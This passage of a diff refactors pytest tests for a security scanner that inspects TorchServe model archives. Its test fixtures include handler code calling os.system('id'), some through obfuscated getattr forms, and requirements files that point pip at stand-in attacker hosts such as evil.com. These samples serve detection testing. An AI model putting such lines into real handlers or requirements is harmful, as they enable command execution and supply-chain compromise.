TorchServeMarScanner()._find_high_risk_calls(handler_source) - - assert parse_error is None - assert "os.system" not in risky_calls + _assert_handler_without_system_call(handler_source) def test_dynamic_import_handler_analysis_carries_failed_match_guard_side_effects() -> None: @@ -2415,10 +2226,7 @@ def test_dynamic_import_handler_analysis_carries_failed_match_guard_side_effects b" return module.system('id')\n" ) - risky_calls, parse_error = TorchServeMarScanner()._find_high_risk_calls(handler_source) - - assert parse_error is None - assert "os.system" in risky_calls + _assert_handler_dangerous_call(handler_source, "os.system") def test_dynamic_import_handler_analysis_replaces_state_in_failed_match_guards() -> None: @@ -2432,10 +2240,7 @@ def test_dynamic_import_handler_analysis_replaces_state_in_failed_match_guards() b" return module.system('id')\n" ) - risky_calls, parse_error = TorchServeMarScanner()._find_high_risk_calls(handler_source) - - assert parse_error is None - assert "os.system" not in risky_calls + _assert_handler_without_system_call(handler_source) def test_dynamic_import_handler_analysis_uses_rebound_state_at_explicit_raise() -> None: @@ -2450,10 +2255,7 @@ def test_dynamic_import_handler_analysis_uses_rebound_state_at_explicit_raise() b" return module.system('id')\n" ) - risky_calls, parse_error = TorchServeMarScanner()._find_high_risk_calls(handler_source) - - assert parse_error is None - assert "os.system" not in risky_calls + _assert_handler_without_system_call(handler_source) def test_dynamic_import_handler_analysis_keeps_dangerous_state_at_explicit_raise() -> None: @@ -2468,10 +2270,7 @@ def test_dynamic_import_handler_analysis_keeps_dangerous_state_at_explicit_raise b" return module.system('id')\n" ) - risky_calls, parse_error = TorchServeMarScanner()._find_high_risk_calls(handler_source) - - assert parse_error is None - assert "os.system" in risky_calls + _assert_handler_dangerous_call(handler_source, "os.system") def test_dynamic_import_handler_analysis_keeps_dangerous_state_at_nested_raise() -> None: @@ -2487,10 +2286,7 @@ def test_dynamic_import_handler_analysis_keeps_dangerous_state_at_nested_raise() b" return module.system('id')\n" ) - risky_calls, parse_error = TorchServeMarScanner()._find_high_risk_calls(handler_source) - - assert parse_error is None - assert "os.system" in risky_calls + _assert_handler_dangerous_call(handler_source, "os.system") def test_dynamic_import_handler_analysis_does_not_restore_deleted_alias_at_raise() -> None: @@ -2505,10 +2301,7 @@ def test_dynamic_import_handler_analysis_does_not_restore_deleted_alias_at_raise b" return module.system('id')\n" ) - risky_calls, parse_error = TorchServeMarScanner()._find_high_risk_calls(handler_source) - - assert parse_error is None - assert "os.system" not in risky_calls + _assert_handler_without_system_call(handler_source) @pytest.mark.skipif(sys.version_info < (3, 11), reason="except* requires Python 3.11+") @@ -2525,10 +2318,7 @@ def test_dynamic_import_handler_analysis_merges_exception_group_handler_states() b" return module.system('id')\n" ) - risky_calls, parse_error = TorchServeMarScanner()._find_high_risk_calls(handler_source) - - assert parse_error is None - assert "os.system" in risky_calls + _assert_handler_dangerous_call(handler_source, "os.system") @pytest.mark.skipif(sys.version_info < (3, 11), reason="except* requires Python 3.11+") @@ -2544,10 +2334,7 @@ def test_dynamic_import_handler_analysis_chains_exception_group_handler_states() b" module.system('id')\n" ) - risky_calls, parse_error = TorchServeMarScanner()._find_high_risk_calls(handler_source) - - assert parse_error is None - assert "os.system" in risky_calls + _assert_handler_dangerous_call(handler_source, "os.system") def test_dynamic_import_handler_analysis_keeps_regular_exception_handlers_exclusive() -> None: @@ -2562,10 +2349,7 @@ def test_dynamic_import_handler_analysis_keeps_regular_exception_handlers_exclus b" module.system('id')\n" ) - risky_calls, parse_error = TorchServeMarScanner()._find_high_risk_calls(handler_source) - - assert parse_error is None - assert "os.system" not in risky_calls + _assert_handler_without_system_call(handler_source) @pytest.mark.skipif(sys.version_info < (3, 11), reason="except* requires Python 3.11+") @@ -2580,10 +2364,7 @@ def test_dynamic_import_handler_analysis_skips_unreachable_exception_group_handl b" return module.system('id')\n" ) - risky_calls, parse_error = TorchServeMarScanner()._find_high_risk_calls(handler_source) - - assert parse_error is None - assert "os.system" not in risky_calls + _assert_handler_without_system_call(handler_source) @pytest.mark.parametrize( @@ -2607,10 +2388,7 @@ def test_dynamic_import_handler_analysis_skips_unreachable_exception_group_handl def test_dynamic_import_handler_analysis_merges_expression_and_helper_aliases( handler_source: bytes, ) -> None: - risky_calls, parse_error = TorchServeMarScanner()._find_high_risk_calls(handler_source) - - assert parse_error is None - assert "os.system" in risky_calls + _assert_handler_dangerous_call(handler_source, "os.system") @pytest.mark.parametrize( @@ -2955,10 +2733,7 @@ def test_dynamic_import_handler_analysis_merges_expression_and_helper_aliases( def test_dynamic_import_handler_analysis_ignores_statically_unreachable_aliases( handler_source: bytes, ) -> None: - risky_calls, parse_error = TorchServeMarScanner()._find_high_risk_calls(handler_source) - - assert parse_error is None - assert "os.system" not in risky_calls + _assert_handler_without_system_call(handler_source) @pytest.mark.parametrize( @@ -3209,10 +2984,7 @@ def test_dynamic_import_handler_analysis_ignores_statically_unreachable_aliases( def test_dynamic_import_handler_analysis_preserves_reachable_aliases( handler_source: bytes, ) -> None: - risky_calls, parse_error = TorchServeMarScanner()._find_high_risk_calls(handler_source) - - assert parse_error is None - assert "os.system" in risky_calls + _assert_handler_dangerous_call(handler_source, "os.system") @pytest.mark.parametrize( @@ -3335,76 +3107,42 @@ def test_scan_allows_shadowed_direct_handler_primitives(tmp_path: Path, handler_ def test_scan_detects_dunder_call_getattr_wrapped_handler_execution_primitive(tmp_path: Path) -> None: - manifest = {"model": {"handler": "handler.py", "serializedFile": "weights.bin"}} - mar_path = _create_mar_archive( + _assert_getattr_handler_execution( tmp_path, - manifest=manifest, - entries={ - "handler.py": ( - b"import os\n\ndef handle(data, context):\n return getattr(os, 'system').__call__('id')\n" - ), - "weights.bin": b"weights", - }, - filename="dunder_call_getattr_handler.mar", + (b"import os\n\ndef handle(data, context):\n return getattr(os, 'system').__call__('id')\n"), + ("dunder_call_getattr_handler.mar"), ) - result = TorchServeMarScanner().scan(str(mar_path)) - handler_failures = _failed_checks(result, "TorchServe Handler Static Analysis") - - assert len(handler_failures) == 1 - assert handler_failures[0].severity == IssueSeverity.CRITICAL - assert "os.system" in handler_failures[0].message - def test_scan_allows_benign_getattr_handler_access(tmp_path: Path) -> None: - manifest = {"model": {"handler": "handler.py", "serializedFile": "weights.bin"}} - mar_path = _create_mar_archive( + _assert_safe_getattr_handler( tmp_path, - manifest=manifest, - entries={ - "handler.py": ( - b"class Handler:\n" - b" def __init__(self):\n" - b" self._value = {'ok': True}\n" - b"\n" - b" def handle(self, data, context):\n" - b" return getattr(object=self, name='_value')\n" - ), - "weights.bin": b"weights", - }, - filename="benign_getattr_handler.mar", + ( + b"class Handler:\n" + b" def __init__(self):\n" + b" self._value = {'ok': True}\n" + b"\n" + b" def handle(self, data, context):\n" + b" return getattr(object=self, name='_value')\n" + ), + ("benign_getattr_handler.mar"), ) - result = TorchServeMarScanner().scan(str(mar_path)) - handler_failures = _failed_checks(result, "TorchServe Handler Static Analysis") - - assert handler_failures == [] - def test_scan_allows_benign_dunder_call_getattr_handler_access(tmp_path: Path) -> None: - manifest = {"model": {"handler": "handler.py", "serializedFile": "weights.bin"}} - mar_path = _create_mar_archive( + _assert_safe_getattr_handler( tmp_path, - manifest=manifest, - entries={ - "handler.py": ( - b"class Handler:\n" - b" def _safe_value(self):\n" - b" return {'ok': True}\n" - b"\n" - b" def handle(self, data, context):\n" - b" return getattr(self, '_safe_value').__call__()\n" - ), - "weights.bin": b"weights", - }, - filename="benign_dunder_call_getattr_handler.mar", + ( + b"class Handler:\n" + b" def _safe_value(self):\n" + b" return {'ok': True}\n" + b"\n" + b" def handle(self, data, context):\n" + b" return getattr(self, '_safe_value').__call__()\n" + ), + ("benign_dunder_call_getattr_handler.mar"), ) - result = TorchServeMarScanner().scan(str(mar_path)) - handler_failures = _failed_checks(result, "TorchServe Handler Static Analysis") - - assert handler_failures == [] - def test_scan_accepts_clean_duplicate_handler_members(tmp_path: Path) -> None: manifest = {"model": {"handler": "handler.py", "serializedFile": "weights.bin"}} @@ -3591,34 +3329,24 @@ def counting_parse(source: str, *args: Any, **kwargs: Any) -> ast.AST: def test_non_handler_python_metadata_assignments_do_not_trigger_import_time_execution(tmp_path: Path) -> None: - manifest = {"model": {"handler": "handler.py", "serializedFile": "weights.bin"}} - mar_path = _create_mar_archive( + _assert_inert_python_metadata( tmp_path, - manifest=manifest, - entries={ - "handler.py": b"import utils\n\ndef handle(data, context):\n return utils.transform(data)\n", - "utils.py": ( - b'"""Metadata-only helper."""\n' - b'__all__ = ["transform"]\n' - b'__version__ = "1.0.0"\n' - b"import typing\n" - b"if typing.TYPE_CHECKING:\n" - b" from typing import Any\n" - b'if __name__ == "__main__":\n' - b' raise RuntimeError("cli only")\n' - b"\n" - b"def transform(data):\n" - b" return data\n" - ), - "weights.bin": b"weights", - }, - filename="metadata_only_utils.mar", + ( + b'"""Metadata-only helper."""\n' + b'__all__ = ["transform"]\n' + b'__version__ = "1.0.0"\n' + b"import typing\n" + b"if typing.TYPE_CHECKING:\n" + b" from typing import Any\n" + b'if __name__ == "__main__":\n' + b' raise RuntimeError("cli only")\n' + b"\n" + b"def transform(data):\n" + b" return data\n" + ), + ("metadata_only_utils.mar"), ) - result = TorchServeMarScanner().scan(str(mar_path)) - non_handler_failures = _failed_checks(result, "MAR Non-Handler Python Analysis") - assert non_handler_failures == [] - def test_import_time_analysis_respects_type_checking_rebinding() -> None: scanner = TorchServeMarScanner() @@ -3651,24 +3379,12 @@ def test_import_time_analysis_checks_selected_guard_else_branches() -> None: def test_non_handler_python_logger_initialization_does_not_trigger_import_time_execution(tmp_path: Path) -> None: - manifest = {"model": {"handler": "handler.py", "serializedFile": "weights.bin"}} - mar_path = _create_mar_archive( + _assert_inert_python_metadata( tmp_path, - manifest=manifest, - entries={ - "handler.py": b"import utils\n\ndef handle(data, context):\n return utils.transform(data)\n", - "utils.py": ( - b"import logging as log\nlogger = log.getLogger(__name__)\n\ndef transform(data):\n return data\n" - ), - "weights.bin": b"weights", - }, - filename="logger_init_utils.mar", + (b"import logging as log\nlogger = log.getLogger(__name__)\n\ndef transform(data):\n return data\n"), + ("logger_init_utils.mar"), ) - result = TorchServeMarScanner().scan(str(mar_path)) - non_handler_failures = _failed_checks(result, "MAR Non-Handler Python Analysis") - assert non_handler_failures == [] - def test_non_handler_python_analysis_detects_malicious_init_module(tmp_path: Path) -> None: manifest = {"model": {"handler": "handler.py", "serializedFile": "weights.bin"}} @@ -3860,19 +3576,7 @@ def test_non_handler_python_analysis_read_failure_is_reported_without_aborting( filename="read_failure_utils.mar", ) - original_read_member_bounded = TorchServeMarScanner._read_member_bounded - - def read_with_failure( - self: TorchServeMarScanner, - archive: zipfile.ZipFile, - member_info: zipfile.ZipInfo, - max_bytes: int, - ) -> bytes: - if member_info.filename == "utils.py": - raise RuntimeError("CRC mismatch") - return original_read_member_bounded(self, archive, member_info, max_bytes) - - monkeypatch.setattr(TorchServeMarScanner, "_read_member_bounded", read_with_failure) + _install_member_read_failure(monkeypatch, "utils.py") result = TorchServeMarScanner().scan(str(mar_path)) @@ -4331,25 +4035,14 @@ def test_manifest_parsing_respects_entry_limit_for_duplicate_manifest_floods( ) scanner = TorchServeMarScanner(config={"max_mar_entries": 2}) - real_read_member_bounded = scanner._read_member_bounded - manifest_read_count = 0 - - def counting_read_member_bounded( - archive: zipfile.ZipFile, - member_info: zipfile.ZipInfo, - max_bytes: int, - ) -> bytes: - nonlocal manifest_read_count - if member_info.filename == "MAR-INF/MANIFEST.json": - manifest_read_count += 1 - return real_read_member_bounded(archive, member_info, max_bytes) - - monkeypatch.setattr(scanner, "_read_member_bounded", counting_read_member_bounded) + manifest_read_count = _count_matching_member_reads( + monkeypatch, scanner, lambda name: name == "MAR-INF/MANIFEST.json" + ) result = scanner.scan(str(mar_path)) assert result.success is False - assert manifest_read_count == 2 + assert manifest_read_count[0] == 2 entry_limit_failures = _failed_checks(result, "TorchServe Manifest Entry Limit") assert len(entry_limit_failures) == 1 assert entry_limit_failures[0].severity == IssueSeverity.INFO @@ -4377,25 +4070,14 @@ def test_manifest_parsing_respects_uncompressed_budget_for_duplicate_manifest_fl ) scanner = TorchServeMarScanner(config={"max_mar_uncompressed_bytes": len(manifest_bytes)}) - real_read_member_bounded = scanner._read_member_bounded - manifest_read_count = 0 - - def counting_read_member_bounded( - archive: zipfile.ZipFile, - member_info: zipfile.ZipInfo, - max_bytes: int, - ) -> bytes: - nonlocal manifest_read_count - if member_info.filename == "MAR-INF/MANIFEST.json": - manifest_read_count += 1 - return real_read_member_bounded(archive, member_info, max_bytes) - - monkeypatch.setattr(scanner, "_read_member_bounded", counting_read_member_bounded) + manifest_read_count = _count_matching_member_reads( + monkeypatch, scanner, lambda name: name == "MAR-INF/MANIFEST.json" + ) result = scanner.scan(str(mar_path)) assert result.success is False - assert manifest_read_count == 1 + assert manifest_read_count[0] == 1 budget_failures = _failed_checks(result, "TorchServe Manifest Uncompressed Size Budget") assert len(budget_failures) == 1 assert budget_failures[0].severity == IssueSeverity.INFO @@ -4461,25 +4143,12 @@ def test_handler_analysis_respects_entry_limit_for_manifest_handler_fanout( ) scanner = TorchServeMarScanner(config={"max_mar_entries": 2}) - real_read_member_bounded = scanner._read_member_bounded - handler_read_count = 0 - - def counting_read_member_bounded( - archive: zipfile.ZipFile, - member_info: zipfile.ZipInfo, - max_bytes: int, - ) -> bytes: - nonlocal handler_read_count - if member_info.filename.startswith("handlers/"): - handler_read_count += 1 - return real_read_member_bounded(archive, member_info, max_bytes) - - monkeypatch.setattr(scanner, "_read_member_bounded", counting_read_member_bounded) + handler_read_count = _count_matching_member_reads(monkeypatch, scanner, lambda name: name.startswith("handlers/")) result = scanner.scan(str(mar_path)) assert result.success is False - assert handler_read_count == 2 + assert handler_read_count[0] == 2 entry_limit_failures = _failed_checks(result, "TorchServe Handler Entry Limit") assert len(entry_limit_failures) == 1 assert entry_limit_failures[0].severity == IssueSeverity.INFO @@ -4512,25 +4181,12 @@ def test_handler_analysis_respects_uncompressed_budget_for_manifest_handler_fano ) scanner = TorchServeMarScanner(config={"max_mar_uncompressed_bytes": len(handler_source)}) - real_read_member_bounded = scanner._read_member_bounded - handler_read_count = 0 - - def counting_read_member_bounded( - archive: zipfile.ZipFile, - member_info: zipfile.ZipInfo, - max_bytes: int, - ) -> bytes: - nonlocal handler_read_count - if member_info.filename.startswith("handlers/"): - handler_read_count += 1 - return real_read_member_bounded(archive, member_info, max_bytes) - - monkeypatch.setattr(scanner, "_read_member_bounded", counting_read_member_bounded) + handler_read_count = _count_matching_member_reads(monkeypatch, scanner, lambda name: name.startswith("handlers/")) result = scanner.scan(str(mar_path)) assert result.success is False - assert handler_read_count == 1 + assert handler_read_count[0] == 1 budget_failures = _failed_checks(result, "TorchServe Handler Uncompressed Size Budget") assert len(budget_failures) == 1 assert budget_failures[0].severity == IssueSeverity.INFO @@ -4902,164 +4558,62 @@ def test_core_mar_fallback_rejects_boolean_size_limit_config(tmp_path: Path) -> def test_scan_flags_non_pypi_requirements_index_as_critical(tmp_path: Path) -> None: - manifest = {"model": {"handler": "handler.py", "serializedFile": "weights.bin"}} - mar_path = _create_mar_archive( - tmp_path, - manifest=manifest, - entries={ - "handler.py": b"def handle(data, context):\n return {'ok': True}\n", - "weights.bin": b"weights", - "requirements.txt": b"--index-url http://evil.com/simple\nnumpy==1.26.4\n", - }, - filename="requirements_evil_index.mar", + _assert_critical_requirements( + tmp_path, (b"--index-url http://evil.com/simple\nnumpy==1.26.4\n"), ("requirements_evil_index.mar") ) - result = TorchServeMarScanner().scan(str(mar_path)) - requirements_failures = _failed_checks(result, "TorchServe Requirements Supply Chain Analysis") - assert len(requirements_failures) == 1 - assert requirements_failures[0].severity == IssueSeverity.CRITICAL - assert any( - finding["reason"] == "non_pypi_index_url" for finding in requirements_failures[0].details.get("findings", []) +def test_scan_flags_non_pypi_requirements_index_equals_form_as_critical(tmp_path: Path) -> None: + _assert_critical_requirements( + tmp_path, (b"--index-url=https://evil.com/simple\nnumpy==1.26.4\n"), ("requirements_evil_index_equals.mar") ) -def test_scan_flags_non_pypi_requirements_index_equals_form_as_critical(tmp_path: Path) -> None: - manifest = {"model": {"handler": "handler.py", "serializedFile": "weights.bin"}} - mar_path = _create_mar_archive( - tmp_path, - manifest=manifest, - entries={ - "handler.py": b"def handle(data, context):\n return {'ok': True}\n", - "weights.bin": b"weights", - "requirements.txt": b"--index-url=https://evil.com/simple\nnumpy==1.26.4\n", - }, - filename="requirements_evil_index_equals.mar", +def test_scan_flags_non_pypi_requirements_short_index_option_as_critical(tmp_path: Path) -> None: + _assert_critical_requirements( + tmp_path, (b"-i https://evil.com/simple\nnumpy==1.26.4\n"), ("requirements_evil_index_short.mar") ) - result = TorchServeMarScanner().scan(str(mar_path)) - requirements_failures = _failed_checks(result, "TorchServe Requirements Supply Chain Analysis") - assert len(requirements_failures) == 1 - assert requirements_failures[0].severity == IssueSeverity.CRITICAL - assert any( - finding["reason"] == "non_pypi_index_url" for finding in requirements_failures[0].details.get("findings", []) +def test_scan_flags_non_pypi_requirements_concatenated_short_index_option_as_critical(tmp_path: Path) -> None: + _assert_critical_requirements( + tmp_path, (b"-ihttps://evil.com/simple\nnumpy==1.26.4\n"), ("requirements_evil_index_concatenated_short.mar") ) -def test_scan_flags_non_pypi_requirements_short_index_option_as_critical(tmp_path: Path) -> None: +def test_scan_flags_editable_git_requirements_as_warning(tmp_path: Path) -> None: + _assert_editable_git_warning( + tmp_path, (b"-e git+https://evil.com/repo#egg=evilpkg\n"), ("requirements_editable_git.mar") + ) + + +def test_scan_flags_editable_equals_git_requirements_as_warning(tmp_path: Path) -> None: + _assert_editable_git_warning( + tmp_path, (b"--editable=git+https://evil.com/repo#egg=evilpkg\n"), ("requirements_editable_equals_git.mar") + ) + + +def test_scan_flags_remote_find_links_equals_and_short_forms_as_warning(tmp_path: Path) -> None: manifest = {"model": {"handler": "handler.py", "serializedFile": "weights.bin"}} - mar_path = _create_mar_archive( + mar_equals_path = _create_mar_archive( tmp_path, manifest=manifest, entries={ "handler.py": b"def handle(data, context):\n return {'ok': True}\n", "weights.bin": b"weights", - "requirements.txt": b"-i https://evil.com/simple\nnumpy==1.26.4\n", + "requirements.txt": b"--find-links=https://evil.com/simple\nnumpy==1.26.4\n", }, - filename="requirements_evil_index_short.mar", - ) - - result = TorchServeMarScanner().scan(str(mar_path)) - requirements_failures = _failed_checks(result, "TorchServe Requirements Supply Chain Analysis") - - assert len(requirements_failures) == 1 - assert requirements_failures[0].severity == IssueSeverity.CRITICAL - assert any( - finding["reason"] == "non_pypi_index_url" for finding in requirements_failures[0].details.get("findings", []) + filename="requirements_find_links_equals.mar", ) - - -def test_scan_flags_non_pypi_requirements_concatenated_short_index_option_as_critical(tmp_path: Path) -> None: - manifest = {"model": {"handler": "handler.py", "serializedFile": "weights.bin"}} - mar_path = _create_mar_archive( + mar_short_path = _create_mar_archive( tmp_path, manifest=manifest, entries={ "handler.py": b"def handle(data, context):\n return {'ok': True}\n", "weights.bin": b"weights", - "requirements.txt": b"-ihttps://evil.com/simple\nnumpy==1.26.4\n", + "requirements.txt": b"-f https://evil.com/simple\nnumpy==1.26.4\n", }, - filename="requirements_evil_index_concatenated_short.mar", - ) - - result = TorchServeMarScanner().scan(str(mar_path)) - requirements_failures = _failed_checks(result, "TorchServe Requirements Supply Chain Analysis") - - assert len(requirements_failures) == 1 - assert requirements_failures[0].severity == IssueSeverity.CRITICAL - assert any( - finding["reason"] == "non_pypi_index_url" for finding in requirements_failures[0].details.get("findings", []) - ) - - -def test_scan_flags_editable_git_requirements_as_warning(tmp_path: Path) -> None: - manifest = {"model": {"handler": "handler.py", "serializedFile": "weights.bin"}} - mar_path = _create_mar_archive( - tmp_path, - manifest=manifest, - entries={ - "handler.py": b"def handle(data, context):\n return {'ok': True}\n", - "weights.bin": b"weights", - "requirements.txt": b"-e git+https://evil.com/repo#egg=evilpkg\n", - }, - filename="requirements_editable_git.mar", - ) - - result = TorchServeMarScanner().scan(str(mar_path)) - requirements_failures = _failed_checks(result, "TorchServe Requirements Supply Chain Analysis") - - assert len(requirements_failures) == 1 - assert requirements_failures[0].severity == IssueSeverity.WARNING - reasons = {finding["reason"] for finding in requirements_failures[0].details.get("findings", [])} - assert "editable_install" in reasons - assert "git_install" in reasons - - -def test_scan_flags_editable_equals_git_requirements_as_warning(tmp_path: Path) -> None: - manifest = {"model": {"handler": "handler.py", "serializedFile": "weights.bin"}} - mar_path = _create_mar_archive( - tmp_path, - manifest=manifest, - entries={ - "handler.py": b"def handle(data, context):\n return {'ok': True}\n", - "weights.bin": b"weights", - "requirements.txt": b"--editable=git+https://evil.com/repo#egg=evilpkg\n", - }, - filename="requirements_editable_equals_git.mar", - ) - - result = TorchServeMarScanner().scan(str(mar_path)) - requirements_failures = _failed_checks(result, "TorchServe Requirements Supply Chain Analysis") - - assert len(requirements_failures) == 1 - assert requirements_failures[0].severity == IssueSeverity.WARNING - reasons = {finding["reason"] for finding in requirements_failures[0].details.get("findings", [])} - assert "editable_install" in reasons - assert "git_install" in reasons - - -def test_scan_flags_remote_find_links_equals_and_short_forms_as_warning(tmp_path: Path) -> None: - manifest = {"model": {"handler": "handler.py", "serializedFile": "weights.bin"}} - mar_equals_path = _create_mar_archive( - tmp_path, - manifest=manifest, - entries={ - "handler.py": b"def handle(data, context):\n return {'ok': True}\n", - "weights.bin": b"weights", - "requirements.txt": b"--find-links=https://evil.com/simple\nnumpy==1.26.4\n", - }, - filename="requirements_find_links_equals.mar", - ) - mar_short_path = _create_mar_archive( - tmp_path, - manifest=manifest, - entries={ - "handler.py": b"def handle(data, context):\n return {'ok': True}\n", - "weights.bin": b"weights", - "requirements.txt": b"-f https://evil.com/simple\nnumpy==1.26.4\n", - }, - filename="requirements_find_links_short.mar", + filename="requirements_find_links_short.mar", ) mar_concatenated_short_path = _create_mar_archive( tmp_path, @@ -5084,23 +4638,7 @@ def test_scan_flags_remote_find_links_equals_and_short_forms_as_warning(tmp_path def test_scan_accepts_clean_requirements_txt(tmp_path: Path) -> None: - manifest = {"model": {"handler": "handler.py", "serializedFile": "weights.bin"}} - mar_path = _create_mar_archive( - tmp_path, - manifest=manifest, - entries={ - "handler.py": b"def handle(data, context):\n return {'ok': True}\n", - "weights.bin": b"weights", - "requirements.txt": b"numpy==1.26.4\ntorch==2.2.2\n", - }, - filename="requirements_clean.mar", - ) - - result = TorchServeMarScanner().scan(str(mar_path)) - requirements_checks = _checks_named(result, "TorchServe Requirements Supply Chain Analysis") - - assert len(requirements_checks) == 1 - assert requirements_checks[0].status == CheckStatus.PASSED + _assert_clean_requirements(tmp_path, (b"numpy==1.26.4\ntorch==2.2.2\n"), ("requirements_clean.mar")) def test_scan_flags_colliding_requirements_txt_member_even_when_benign_alias_is_last(tmp_path: Path) -> None: @@ -5173,69 +4711,29 @@ def test_scan_accepts_clean_colliding_requirements_txt_aliases(tmp_path: Path) - def test_scan_ignores_inline_comment_urls_in_safe_requirements(tmp_path: Path) -> None: - manifest = {"model": {"handler": "handler.py", "serializedFile": "weights.bin"}} - mar_path = _create_mar_archive( - tmp_path, - manifest=manifest, - entries={ - "handler.py": b"def handle(data, context):\n return {'ok': True}\n", - "weights.bin": b"weights", - "requirements.txt": b"numpy==1.26.4 # docs http://example.com\n", - }, - filename="requirements_comment_url.mar", + _assert_clean_requirements( + tmp_path, (b"numpy==1.26.4 # docs http://example.com\n"), ("requirements_comment_url.mar") ) - result = TorchServeMarScanner().scan(str(mar_path)) - requirements_checks = _checks_named(result, "TorchServe Requirements Supply Chain Analysis") - - assert len(requirements_checks) == 1 - assert requirements_checks[0].status == CheckStatus.PASSED - def test_scan_accepts_local_find_links_and_pypi_short_index(tmp_path: Path) -> None: - manifest = {"model": {"handler": "handler.py", "serializedFile": "weights.bin"}} - mar_path = _create_mar_archive( + _assert_clean_requirements( tmp_path, - manifest=manifest, - entries={ - "handler.py": b"def handle(data, context):\n return {'ok': True}\n", - "weights.bin": b"weights", - "requirements.txt": ( - b"-i https://pypi.org/simple\n" - b"--extra-index-url=https://files.pythonhosted.org/simple\n" - b"--find-links file:///opt/wheels\n" - b"numpy==1.26.4\n" - ), - }, - filename="requirements_local_find_links.mar", + ( + b"-i https://pypi.org/simple\n" + b"--extra-index-url=https://files.pythonhosted.org/simple\n" + b"--find-links file:///opt/wheels\n" + b"numpy==1.26.4\n" + ), + ("requirements_local_find_links.mar"), ) - result = TorchServeMarScanner().scan(str(mar_path)) - requirements_checks = _checks_named(result, "TorchServe Requirements Supply Chain Analysis") - - assert len(requirements_checks) == 1 - assert requirements_checks[0].status == CheckStatus.PASSED - def test_scan_accepts_local_direct_url_requirement(tmp_path: Path) -> None: - manifest = {"model": {"handler": "handler.py", "serializedFile": "weights.bin"}} - mar_path = _create_mar_archive( - tmp_path, - manifest=manifest, - entries={ - "handler.py": b"def handle(data, context):\n return {'ok': True}\n", - "weights.bin": b"weights", - "requirements.txt": b"torch @ file:///opt/wheels/torch.whl\n", - }, - filename="requirements_local_direct_url.mar", + _assert_clean_requirements( + tmp_path, (b"torch @ file:///opt/wheels/torch.whl\n"), ("requirements_local_direct_url.mar") ) - result = TorchServeMarScanner().scan(str(mar_path)) - requirements_checks = _checks_named(result, "TorchServe Requirements Supply Chain Analysis") - - assert len(requirements_checks) == 1 - assert requirements_checks[0].status == CheckStatus.PASSED - def test_scan_analyzes_local_included_requirements_files(tmp_path: Path) -> None: manifest = {"model": {"handler": "handler.py", "serializedFile": "weights.bin"}} @@ -5349,27 +4847,7 @@ def test_scan_flags_external_local_requirements_include_as_warning( requirements_line: str, filename: str, ) -> None: - manifest = {"model": {"handler": "handler.py", "serializedFile": "weights.bin"}} - mar_path = _create_mar_archive( - tmp_path, - manifest=manifest, - entries={ - "handler.py": b"def handle(data, context):\n return {'ok': True}\n", - "weights.bin": b"weights", - "requirements.txt": requirements_line.encode("utf-8"), - }, - filename=filename, - ) - - result = TorchServeMarScanner().scan(str(mar_path)) - requirements_failures = _failed_checks(result, "TorchServe Requirements Supply Chain Analysis") - - assert len(requirements_failures) == 1 - assert requirements_failures[0].severity == IssueSeverity.WARNING - assert any( - finding["reason"] == "external_requirements_include" - for finding in requirements_failures[0].details.get("findings", []) - ) + _assert_external_requirements_warning(tmp_path, requirements_line, filename, ("external_requirements_include")) def test_scan_accepts_clean_local_included_requirements_files(tmp_path: Path) -> None: @@ -5394,49 +4872,17 @@ def test_scan_accepts_clean_local_included_requirements_files(tmp_path: Path) -> def test_scan_flags_remote_requirements_include_as_warning(tmp_path: Path) -> None: - manifest = {"model": {"handler": "handler.py", "serializedFile": "weights.bin"}} - mar_path = _create_mar_archive( + _assert_warning_requirements( tmp_path, - manifest=manifest, - entries={ - "handler.py": b"def handle(data, context):\n return {'ok': True}\n", - "weights.bin": b"weights", - "requirements.txt": b"-r https://evil.com/requirements.txt\n", - }, - filename="requirements_remote_include.mar", - ) - - result = TorchServeMarScanner().scan(str(mar_path)) - requirements_failures = _failed_checks(result, "TorchServe Requirements Supply Chain Analysis") - - assert len(requirements_failures) == 1 - assert requirements_failures[0].severity == IssueSeverity.WARNING - assert any( - finding["reason"] == "remote_requirements_include" - for finding in requirements_failures[0].details.get("findings", []) + (b"-r https://evil.com/requirements.txt\n"), + ("requirements_remote_include.mar"), + ("remote_requirements_include"), ) def test_scan_flags_direct_url_requirement_as_warning(tmp_path: Path) -> None: - manifest = {"model": {"handler": "handler.py", "serializedFile": "weights.bin"}} - mar_path = _create_mar_archive( - tmp_path, - manifest=manifest, - entries={ - "handler.py": b"def handle(data, context):\n return {'ok': True}\n", - "weights.bin": b"weights", - "requirements.txt": b"torch @ https://evil.com/pkg.whl\n", - }, - filename="requirements_direct_url.mar", - ) - - result = TorchServeMarScanner().scan(str(mar_path)) - requirements_failures = _failed_checks(result, "TorchServe Requirements Supply Chain Analysis") - - assert len(requirements_failures) == 1 - assert requirements_failures[0].severity == IssueSeverity.WARNING - assert any( - finding["reason"] == "direct_url_install" for finding in requirements_failures[0].details.get("findings", []) + _assert_warning_requirements( + tmp_path, (b"torch @ https://evil.com/pkg.whl\n"), ("requirements_direct_url.mar"), ("direct_url_install") ) @@ -5452,69 +4898,20 @@ def test_scan_flags_concatenated_editable_short_requirements_as_warning( requirements_line: str, filename: str, ) -> None: - manifest = {"model": {"handler": "handler.py", "serializedFile": "weights.bin"}} - mar_path = _create_mar_archive( - tmp_path, - manifest=manifest, - entries={ - "handler.py": b"def handle(data, context):\n return {'ok': True}\n", - "weights.bin": b"weights", - "requirements.txt": requirements_line.encode("utf-8"), - }, - filename=filename, - ) - - result = TorchServeMarScanner().scan(str(mar_path)) - requirements_failures = _failed_checks(result, "TorchServe Requirements Supply Chain Analysis") - - assert len(requirements_failures) == 1 - assert requirements_failures[0].severity == IssueSeverity.WARNING - assert any( - finding["reason"] == "editable_install" for finding in requirements_failures[0].details.get("findings", []) - ) + _assert_external_requirements_warning(tmp_path, requirements_line, filename, ("editable_install")) def test_scan_flags_bare_direct_url_with_userinfo_as_warning(tmp_path: Path) -> None: - manifest = {"model": {"handler": "handler.py", "serializedFile": "weights.bin"}} - mar_path = _create_mar_archive( + _assert_warning_requirements( tmp_path, - manifest=manifest, - entries={ - "handler.py": b"def handle(data, context):\n return {'ok': True}\n", - "weights.bin": b"weights", - "requirements.txt": b"https://user:pass@evil.com/pkg.whl\n", - }, - filename="requirements_bare_userinfo_direct_url.mar", - ) - - result = TorchServeMarScanner().scan(str(mar_path)) - requirements_failures = _failed_checks(result, "TorchServe Requirements Supply Chain Analysis") - - assert len(requirements_failures) == 1 - assert requirements_failures[0].severity == IssueSeverity.WARNING - assert any( - finding["reason"] == "direct_url_install" for finding in requirements_failures[0].details.get("findings", []) + (b"https://user:pass@evil.com/pkg.whl\n"), + 